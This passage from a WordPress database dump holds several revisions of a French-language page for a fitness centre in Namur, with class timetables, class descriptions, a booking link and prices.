href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:19:09', '2014-08-31 08:19:09', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(446, 1, '2014-08-31 08:04:06', '2014-08-31 08:04:06', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td>Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td>15h30</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>16h30</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td>17h30</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>18h15</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>19h00</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>19h45</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:04:06', '2014-08-31 08:04:06', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(447, 1, '2014-08-31 08:05:26', '2014-08-31 08:05:26', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td>Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td>15h30</td>\r\n<td> - </td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>16h30</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td>17h30</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>18h15</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>19h00</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>19h45</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:05:26', '2014-08-31 08:05:26', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(448, 1, '2014-08-31 08:07:36', '2014-08-31 08:07:36', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td>15h30</td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>16h30</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td>17h30</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>18h15</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>19h00</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>19h45</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:07:36', '2014-08-31 08:07:36', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(450, 1, '2014-08-31 08:10:52', '2014-08-31 08:10:52', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">15h30</td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tpsychomot\">Psychomotricité</td>\r\n<td class=\"tvide\"> - </td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">16h30</td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tvide\"> - </td>\r\n<td class=\"tpsychomot\">Réservé Squash</td>\r\n<td class=\"tvide\"> - </td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td>17h30</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td>18h15</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img 